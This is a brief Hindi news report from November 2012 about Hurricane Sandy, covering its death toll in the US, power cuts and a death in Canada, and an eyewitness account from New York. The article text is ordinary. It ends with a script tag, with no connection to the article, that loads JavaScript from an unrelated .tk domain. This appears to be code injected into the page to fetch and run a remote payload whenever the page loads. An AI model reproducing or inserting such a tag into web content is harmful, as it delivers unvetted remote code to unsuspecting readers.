अब कनाडा की ओर तबाही

On: 1 November, 2012

न्यूयॉर्क/न्यूजर्सी/टोरंटो:-अमरीका में तबाही की क्रूरतम इबारत लिखने के बाद चक्रवाती तूफान यहां से धीरे-धीरे ही सही पर विदा ले रहा है। दुनिया के सुपर पॉवर अमरीका में सैंडी ने जमकर तबाही मचाई। अमरीकी मीडिया ने कहा है कि सैंडी के कारण कुल 55 लोगों की मौत हुई है और सबसे ज्यादा 23 लोग न्यूयॉर्क में मारे गए हैं।क्या हैं कनाडा के हाल: कनाडा में एक लाख 30 हजार घरों की बिजली गायब है। वैसे अधिकांश इलाकों में बिजली ऎहतियात के तौर पर ही बंद की गई है। घरों के अलावा निजी और सरकारी व्यापारिक प्रतिष्ठानों में भी बिजली प्रदाय बंद कर दिया गया है। यहां तूफान के कारण तेज बारिश हो रही है और सड़कों पर पेड़ गिरने से यातायात कम हो गया है। एक महिला की मौत की खबर भी है। कनाडा में हवाओं की रफ्तार 100 किलोमीटर प्रतिघंटे है।न्यूपोर्ट गगनचुम्बी बिल्डिंग की बालकनी से देखा तो शहर दूर-दूर तक बहुत अस्तव्यस्त नजर आ रहा था। हमेशा एक पल भी चुप न बैठे रहने वाले शहर की रफ्तार थम गई थी। सारी सुविधाओं वाले देश में बिना बिजली के बड़ा अटपटा लग रहा था, संचार संपर्क जो नहीं हो पा रहा था। जिन लोगो ने तूफान के दौरान बिजली बंद होने से पहले मोबाइल व लैपटॉप चार्ज कर लिए, वे जीत में रहे और जिन्होंने मोबाइल व लैपटॉप चार्ज नहीं किए, वे सबसे कटे रहे। प्रकृति ने शायद हमारा यह इम्तिहान लिया था कि जब एक सुपर पॉवर देश के लोग कुछ न कर सके । ऎसा लग रहा है कि इस तूफान के बाद सबकुछ व्यवस्थित करने में अभी समय लगेगा। एक उल्लेखनीय बात यह भी रही कि प्रशासन का आपातकालीन प्रबंध बहुत अच्छा रहा। लोगों को दो दिन पहले से चेतावनी देकर उन्हें सतर्क कर दिया गया था। इस दौरान विभागों के बीच आपस में समन्वय नजर आया।(जैसा न्यूयॉर्क से जोधपुर के एनआरआई कुणाल शाह ने एमआई जाहिर को भेजे मेल में बताया)<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>